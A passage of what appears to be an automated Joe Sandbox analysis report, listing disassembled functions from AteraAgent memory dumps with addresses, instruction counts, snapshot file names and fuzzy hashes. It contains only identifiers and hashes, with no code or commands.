                                                                                                                                                                                                                                          • API String ID: 0-3781818083
                                                                                                                                                                                                                                          • Opcode ID: 41b3a30eae2be127fb659a55aec359e7993a8ae501ef393d85fd6aabbac2b592
                                                                                                                                                                                                                                          • Instruction ID: 6930fa7e9756809305db7c64be15a17bb57f9fe70e614798ed90019383158230
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41b3a30eae2be127fb659a55aec359e7993a8ae501ef393d85fd6aabbac2b592
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37C10A26B0E6960FD326BB7854621E87BE0EFC1231B0506BFD189CB5E3E91D59898351
                                                                                                                                                                                                                                          Function 00007FFD9B3D788C Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: E
                                                                                                                                                                                                                                          • API String ID: 0-3568589458
                                                                                                                                                                                                                                          • Opcode ID: 3109b75b8421f7ca9ad27b8ac91580f81e5cc0a508ba29eef881cb7317a45d57
                                                                                                                                                                                                                                          • Instruction ID: 88ac6627de35a87fe5f05d670a723cc5348edb092dc6198e17d26dc033d6af32
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3109b75b8421f7ca9ad27b8ac91580f81e5cc0a508ba29eef881cb7317a45d57
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01512F61B0A68D4FE791EBBC9469AAC7BE0FFC5261B4001BED009C71A6DE292D46C711
                                                                                                                                                                                                                                          Function 00007FFD9B4C0853 Relevance: 1.0, Instructions: 951COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1987448208.00007FFD9B4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4C0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b4c0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ada3bcb061e50d03d2abb5b8a99737058f6f7ecc11fbe13087ed34cc5f71aeb3
                                                                                                                                                                                                                                          • Instruction ID: da3bd8bac42002b9a84350a81ed511d98b50419b230e4b95f76a7e0a056ffc16
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ada3bcb061e50d03d2abb5b8a99737058f6f7ecc11fbe13087ed34cc5f71aeb3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15F12730B0DA4D4FE7A9A76C88656B47BD1EF56B14B0501BED08EC72F7DD18AC428781
                                                                                                                                                                                                                                          Function 00007FFD9B3D0E5B Relevance: .6, Instructions: 562COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 15e1e0b1860b797ebe07725952c41e3d7d91508e8aa3765069fa519ac951b407
                                                                                                                                                                                                                                          • Instruction ID: ec066885eea60bb4a8648319b508abc208a28dacdad1db850833a8463d615ffc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15e1e0b1860b797ebe07725952c41e3d7d91508e8aa3765069fa519ac951b407
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9224B70A0991D8FDB99EF24C4A4AA9B7B2FF58304F6045FDC01ED7295DA36A981CF10
                                                                                                                                                                                                                                          Function 00007FFD9B3DB679 Relevance: .4, Instructions: 421COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 096db063350c092603b30604a3d4b7d29c17e242c01fedca24726ea47e6d3d3d
                                                                                                                                                                                                                                          • Instruction ID: 02c14acdc7034c8722052b328cb3c834aa40ff5a5de2351b594f1ab3fe2e10ae
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 096db063350c092603b30604a3d4b7d29c17e242c01fedca24726ea47e6d3d3d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2D1D730A0CA8D8FEB68EF28C8557E937D1FF94310F04426EE84DC7291DB75A9458B82
                                                                                                                                                                                                                                          Function 00007FFD9B4C0000 Relevance: .4, Instructions: 350COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1987448208.00007FFD9B4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4C0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b4c0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9b8c10374139bdb0275e26e51cb2f333d1639e5560cd2497f0eac1acc4d0f0ac
                                                                                                                                                                                                                                          • Instruction ID: 505e86032de1260d26ce872f09ee8373b7928de66ec4b47afb89a54d132bbb58
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b8c10374139bdb0275e26e51cb2f333d1639e5560cd2497f0eac1acc4d0f0ac
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2A12431B0EB894FD7A5EB6C98655747BE0EF56B10B0601FFD089C72A7DE18AC028341
                                                                                                                                                                                                                                          Function 00007FFD9B3DC536 Relevance: .3, Instructions: 338COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e58274868e6c0d17074f9ad53ee6c62f9cf03306726c02f1e5efa9cca582c58e
                                                                                                                                                                                                                                          • Instruction ID: e28c48e3ece564bda924f347560ecda2cc0b39657d671d771b7b466600c94904
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e58274868e6c0d17074f9ad53ee6c62f9cf03306726c02f1e5efa9cca582c58e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08B1E63061DA8D8FEB69EF28C8557E93BD1FF55310F44426EE84DC7292CB34A9458B82
                                                                                                                                                                                                                                          Function 00007FFD9B3D6772 Relevance: .3, Instructions: 334COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 150b5cee6da222decad56f574ec1f3346d6a2bea1085676b95192e2d3ea80ac4
                                                                                                                                                                                                                                          • Instruction ID: 2f090d5843785e137480eb5a25b58fb64da042f7f5ba544b0e8717938cd2ea6a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 150b5cee6da222decad56f574ec1f3346d6a2bea1085676b95192e2d3ea80ac4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37B14E61A0E6CF4FE761EB7888256A53FE0EF91310F4982FDD06AC71E7D92DA9058340
                                                                                                                                                                                                                                          Function 00007FFD9B3DD7BE Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6b44e692e2728f9d78fcd212a96d81a57005c9fc23301caa732681edc272ea87
                                                                                                                                                                                                                                          • Instruction ID: ee5ff32f8c7928c0396ff19dca63b5545ae3988fe38f1d958c820ee5767d30e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b44e692e2728f9d78fcd212a96d81a57005c9fc23301caa732681edc272ea87
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76B1C874A08A5D8FDF94EF68C894BA8B7F1FF69300F0141A9D00DE7265DA35AD85CB40
                                                                                                                                                                                                                                          Function 00007FFD9B3D7A45 Relevance: .3, Instructions: 277COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d9a2d3550800fa7821e7cff9df4fed17d19ba2b80a81d9ddfb37d4f0aa12c50d
                                                                                                                                                                                                                                          • Instruction ID: 2b218db163f74d8385d6fb7492773430d55bb0320158dce90670997e4cedeb93
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9a2d3550800fa7821e7cff9df4fed17d19ba2b80a81d9ddfb37d4f0aa12c50d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1891DE3090E7CD9FD752EBB488256A9BFF0EF46310F0901EED484DB1A2DA2D5949CB51
                                                                                                                                                                                                                                          Function 00007FFD9B3D1AC8 Relevance: .3, Instructions: 255COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9f21c73da4baadb5c2205b04f0f09cee0564866a3fe3d57922cd3bf4979a7c62
                                                                                                                                                                                                                                          • Instruction ID: 80f27c6d95fb70184a5da6a87974a5397e0547687678513ab502bafa2a310e88
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f21c73da4baadb5c2205b04f0f09cee0564866a3fe3d57922cd3bf4979a7c62
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F918A71D0A66D8FE765DE7488657E9BBF1EF45310F4441B9C049A32A2CA7C1E8ACB10
                                                                                                                                                                                                                                          Function 00007FFD9B3D347E Relevance: .2, Instructions: 196COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3560be0de8b7394fa1a176a64e2e7a37da68e55a95358b9b705da38387da301a
                                                                                                                                                                                                                                          • Instruction ID: 6bf23d50297d21d8daeb6301447d9852cce10b3e64683cd9cba668aeea4b113d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3560be0de8b7394fa1a176a64e2e7a37da68e55a95358b9b705da38387da301a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9614C70A0A65D8FDBA5EB68C8657ACB7B1FF55300F5142ADC00DE7291DA396E85CB00
                                                                                                                                                                                                                                          Function 00007FFD9B3D946C Relevance: .2, Instructions: 195COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 302e1595b63718bf108f56b991ad4caf0c7aafbfd8169913ac1b832f5269dc1d
                                                                                                                                                                                                                                          • Instruction ID: e60b738e283e7cf0521b2c50b582befd832a0d49f89a80549d978f9799af1802
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 302e1595b63718bf108f56b991ad4caf0c7aafbfd8169913ac1b832f5269dc1d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37518331918A1C8FDB68DB58D855BE9BBF1FF59310F0082AAD04DD3292DF34A9858F81
                                                                                                                                                                                                                                          Function 00007FFD9B3DE641 Relevance: .2, Instructions: 190COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 13d270ee3ca1f68c9ae28bf013a3c0c8a495462d3e1e2bd3ef75fe5fd43f52b1
                                                                                                                                                                                                                                          • Instruction ID: 5ea296fc7c74f479e9f48e5849ac85ba3a3a5e6b3bebc008f009a2235f8be14a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13d270ee3ca1f68c9ae28bf013a3c0c8a495462d3e1e2bd3ef75fe5fd43f52b1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B518F34A0951D8FDF98EFA8C4A5AEDBBB1FF59300F02056DD00AE72A1DB35A940CB40
                                                                                                                                                                                                                                          Function 00007FFD9B3D8578 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 19caebd20f73b8833f662e27787f885006ca77a82f4f287389c72a53fafdda02
                                                                                                                                                                                                                                          • Instruction ID: 6f9f04d75d2a978d99922a3293a7ddeef8b7a8eaa277e706e053be0e59425a20
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19caebd20f73b8833f662e27787f885006ca77a82f4f287389c72a53fafdda02
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45514070E0951D8FDBA8EB58D498BEDB7B1EB58305F5041AAD00DE3291DB75AA84CF40
                                                                                                                                                                                                                                          Function 00007FFD9B4C04DE Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1987448208.00007FFD9B4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4C0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b4c0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f14646d89d5c1761d0381e6e0d1561a648856b4e7a2f6920191c5383cd8e5966
                                                                                                                                                                                                                                          • Instruction ID: a4e45f5550a81afe602b2a4cd96859f6b95840c000dcf300b204fa7b3b6f075a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f14646d89d5c1761d0381e6e0d1561a648856b4e7a2f6920191c5383cd8e5966
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41413B62B0EB894FE792E77C48665B47BE1EF66A1430A01FBC049C73B7D918AC42D341
                                                                                                                                                                                                                                          Function 00007FFD9B3D63FB Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4b5db2168de738dfb4566c789531ee8328e65d73afb46f972fd75ed2d538e0e7
                                                                                                                                                                                                                                          • Instruction ID: f174bbda0a173af30bbe8c56d071c36f070d64fb1a5a117621651ca2f062ce83
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b5db2168de738dfb4566c789531ee8328e65d73afb46f972fd75ed2d538e0e7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4441283560EBCE0FDB91EF6898615E93BA0FFD6220B0646BED458C70E2CE256D06C740
                                                                                                                                                                                                                                          Function 00007FFD9B3D8379 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7ffe11c2cee3d27d0b9b58e504a369b17c3e9de35b56a8dcdd708a2e57a1087a
                                                                                                                                                                                                                                          • Instruction ID: 9e05776d68078a38644c77c5fa0836366f812209592e1e1a03efaffff1846a70
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ffe11c2cee3d27d0b9b58e504a369b17c3e9de35b56a8dcdd708a2e57a1087a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B541F770A09A1C8FDB95EFA8C494BADBBF1FF59301F8141A9D00DD7255CB39A985CB00
                                                                                                                                                                                                                                          Function 00007FFD9B3D3368 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3bf24bc8d8ed8fcd0df4c8a86acb2879f70e2a904b1da6745001383db27f8a76
                                                                                                                                                                                                                                          • Instruction ID: 2a7f254704a06cf2036ea36ea68cea7c5dfa18827e99584876f4c26c51731031
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bf24bc8d8ed8fcd0df4c8a86acb2879f70e2a904b1da6745001383db27f8a76
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9418C3090E7898FD7A6EB6484653987BB1EF46310F0541FEC048DB1A2DE796D85CB02
                                                                                                                                                                                                                                          Function 00007FFD9B3D1980 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9e2b4b9ac58e0b6c9a9781e5d851878a03cdd2353279ad0d78e80112508d4d55
                                                                                                                                                                                                                                          • Instruction ID: e14c71b9f41992da825a009e69a2bcfb5c9ea057254a0f281c9f53da686f4d42
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e2b4b9ac58e0b6c9a9781e5d851878a03cdd2353279ad0d78e80112508d4d55
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A315C30D0A65E8FE769EFA080653F9B6B0AF46300F4015BDD00E672A1CB795B84DF14
                                                                                                                                                                                                                                          Function 00007FFD9B3D4EFA Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e906d2b7123899771ca1f6f23805579b3911897dad7e14da246d27211a7acac9
                                                                                                                                                                                                                                          • Instruction ID: 8aceece57656131c8209eca096e6ce592b29680ba6fee81c1c76164b0c9413a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e906d2b7123899771ca1f6f23805579b3911897dad7e14da246d27211a7acac9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5021F432A0EA9D0FDB15EF68A8615D67BA0FF85320B0507BBE45CC72A3CD649945C351
                                                                                                                                                                                                                                          Function 00007FFD9B3DD203 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 92842ae0bd7454c3be7f88cbab83068a04556b8e12ef15031b16cdfd7c35d492
                                                                                                                                                                                                                                          • Instruction ID: ba701ca08af924db27364f6a34935b85b23a000c41925ab220abceb52af1c104
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92842ae0bd7454c3be7f88cbab83068a04556b8e12ef15031b16cdfd7c35d492
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F212870E0960D9FDBA5EBA4C4616EDBBB1FF99300F4141BDD009D72A5CB39A981CB40
                                                                                                                                                                                                                                          Function 00007FFD9B3DE6D9 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 06cc7b11b612c2d28c2e41550a3319e8bbfe29db7aecfb8423ef5a8e753129d7
                                                                                                                                                                                                                                          • Instruction ID: 1a558ff4ea308d0444f0186a945458a5586a20aeaca23f81dbf9b38bd06674a7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06cc7b11b612c2d28c2e41550a3319e8bbfe29db7aecfb8423ef5a8e753129d7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82214F34A0965D8FDB98DF94D860AFEBBB1FF85300F02016EE009D7291CB356950CB50
                                                                                                                                                                                                                                          Function 00007FFD9B3D1E23 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
